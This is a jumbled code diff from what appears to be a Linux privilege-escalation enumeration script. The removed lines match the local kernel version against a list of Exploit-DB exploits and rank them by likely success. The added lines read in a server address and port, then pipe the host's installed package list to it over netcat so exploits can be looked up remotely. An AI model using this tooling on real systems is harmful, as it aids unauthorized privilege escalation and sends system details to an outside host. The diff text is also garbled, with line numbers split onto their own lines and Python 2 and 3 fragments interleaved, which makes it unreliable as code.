# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
243
-
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
330
-
# next check language applicability
331
-
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
332
-
lang = 1 # language found, increase applicability score
333
-
elif sploits[sploit]["lang"] == "sh":
334
-
lang = 1 # language found, increase applicability score
335
-
elif (sploits[sploit]["lang"] in str(langs)):
336
-
lang = 1 # language found, increase applicability score
337
-
if lang == 0:
338
-
sploitout = sploitout + "**" # added mark if language not detected on system
339
-
# next check keyword matches to determine if some sploits have a higher probability of success
340
-
for loc in sploits[sploit]["keywords"]["loc"]:
341
-
if loc == "proc":
342
-
for proc in procs:
343
-
if keyword in proc:
344
-
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
345
-
break
346
-
break
347
-
elif loc == "os":
348
-
if (keyword in os) or (keyword in kernel):
349
-
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
350
-
break
351
-
elif loc == "mnt":
352
-
if keyword in mount:
353
-
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
354
-
break
355
-
else:
356
-
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
357
-
358
-
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
359
-
print
360
-
361
-
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
362
-
for exploit in highprob:
363
-
print " - " + exploit
364
-
print
365
-
366
-
print " The following exploits are applicable to this kernel version and should be investigated as well"
367
-
for exploit in avgprob:
368
-
print " - " + exploit
242
+
question = raw_input("[?] Would you like to search for possible exploits? [y/N] ")
243
+
if 'y' in question.lower():
244
+
server = raw_input("[?] What is the address of the server? ")
245
+
port = raw_input("[?] What port is the server using? ")
246
+
print "[ ] Connecting to {}:{}".format(server,port)
247
+
exploits = {"EXPLOITS":{"cmd":"dpkg -l | tail -n +6 | awk '{{print $2, $3}} END {{print \"\"}}' | nc {} {}".format(server, port), "msg":"Found the following possible exploits"}}
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
247
-
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
339
-
# next check language applicability
340
-
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
341
-
pass # language found, increase applicability score
342
-
elif sploits[sploit]["lang"] == "sh":
343
-
pass # language found, increase applicability score
344
-
elif (sploits[sploit]["lang"] in str(langs)):
345
-
pass # language found, increase applicability score
346
-
else:
347
-
sploitout = sploitout + "**" # added mark if language not detected on system
348
-
# next check keyword matches to determine if some sploits have a higher probability of success
349
-
for loc in sploits[sploit]["keywords"]["loc"]:
350
-
if loc == "proc":
351
-
for proc in procs:
352
-
if keyword in proc:
353
-
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
354
-
break
355
-
break
356
-
elif loc == "os":
357
-
if (keyword in os) or (keyword in kernel):
358
-
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
359
-
break
360
-
elif loc == "mnt":
361
-
if keyword in mount:
362
-
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
363
-
break
364
-
else:
365
-
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
246
+
question = input("[?] Would you like to search for possible exploits? [y/N] ")
247
+
if 'y' in question.lower():
248
+
server = input("[?] What is the address of the server? ")
249
+
port = input("[?] What port is the server using? ")
250
+
print("[ ] Connecting to {}:{}".format(server,port))
251
+
exploits = {"EXPLOITS":{"cmd":"dpkg -l | tail -n +6 | awk '{{print $2, $3}} END {{print \"\"}}' | nc {} {}".format(server, port), "msg":"Found the following possible exploits"}}
252
+
exploits_results = execCmd(exploits)
253
+
printResults(exploits)
366
254
367
-
print(" Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!\n")
368
-
369
-
print(" The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system")
370
-
for exploit in highprob:
371
-
print(" - " + exploit)
372
-
373
-
print("\n The following exploits are applicable to this kernel version and should be investigated as well")